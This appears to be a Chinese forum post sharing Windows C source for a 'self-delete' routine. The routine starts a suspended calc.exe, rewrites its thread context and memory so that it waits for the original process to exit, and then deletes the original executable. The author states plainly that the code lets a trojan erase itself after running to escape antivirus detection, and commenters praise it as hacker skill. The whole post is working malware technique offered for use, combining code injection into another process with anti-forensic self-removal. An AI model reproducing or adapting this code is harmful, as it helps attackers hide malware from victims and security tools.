程序自杀代码 - 洞洞！

run

#include <windows.h>
BOOL DeleteMyself(WCHAR *pHelper)
{
int ret;
WCHAR helper[MAX_PATH];
ZeroMemory(helper, sizeof(helper));
if (pHelper)
wcsncpy(helper, pHelper, MAX_PATH-2);
else
wcscpy(helper, L"calc.exe");
STARTUPINFOW si = {sizeof(STARTUPINFOW),0};
PROCESS_INFORMATION pi;
HANDLE hSYNC = OpenProcess(SYNCHRONIZE, TRUE, GetCurrentProcessId());
if (CreateProcessW(NULL, helper, 0, 0, TRUE, CREATE_SUSPENDED, 0, 0, &si, &pi))
{
CONTEXT ctx = {CONTEXT_FULL,0};
ret = GetThreadContext(pi.hThread, &ctx);
WCHAR MyselfPath[MAX_PATH];
int nPathLen = GetModuleFileNameW(NULL, MyselfPath, MAX_PATH);
struct StackContext
{
DWORD_PTR DeleteFileW;
DWORD_PTR WaitForSingleObject_argv1;
DWORD_PTR WaitForSingleObject_argv2;
DWORD_PTR ExitProcess;
DWORD_PTR DeleteFileW_argv1;
DWORD_PTR shit;
DWORD_PTR ExitProcess_argv1;
}stackctx;
HMODULE hKernel32 = GetModuleHandleW(L"Kernel32.dll");
ctx.Eip = (DWORD_PTR)GetProcAddress(hKernel32, "WaitForSingleObject");
ctx.Esp = (DWORD_PTR)VirtualAllocEx(pi.hProcess, 0, 512*1024, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
ctx.Esp += 256*1024;
stackctx.DeleteFileW = (DWORD_PTR)GetProcAddress(hKernel32, "DeleteFileW");
stackctx.WaitForSingleObject_argv1 = (DWORD_PTR)hSYNC;
stackctx.WaitForSingleObject_argv2 = (DWORD_PTR)-1;
stackctx.ExitProcess = (DWORD_PTR)GetProcAddress(hKernel32, "ExitProcess");
stackctx.DeleteFileW_argv1 = (DWORD_PTR)VirtualAllocEx(pi.hProcess, 0, (nPathLen+1)*sizeof(WCHAR), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
ret = WriteProcessMemory(pi.hProcess, (LPVOID)stackctx.DeleteFileW_argv1, MyselfPath, (nPathLen+1)*sizeof(WCHAR), NULL);
if (!ret) return FALSE;
stackctx.shit = 0;
stackctx.ExitProcess_argv1 = 0;
ret = WriteProcessMemory(pi.hProcess, (LPVOID)(ctx.Esp), &stackctx, sizeof(stackctx), NULL);
if (!ret) return FALSE;
ret = SetThreadContext(pi.hThread, &ctx);
if (!ret) return FALSE;
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return TRUE;
}else
{
return FALSE;
}
}
int main()
{
DeleteMyself(0);
return 0;
}
//2000/xp/2003/vista 上已经测试通过
此代码用于木马在运行完后,在内存中将自己的进程结束,从而躲过杀毒软件的查杀!!慎用!

xiaowuhello

很强大的 木马是在是太厉害了
[查看全文]

ssfi

黑客就要像你这样厉害...
[查看全文]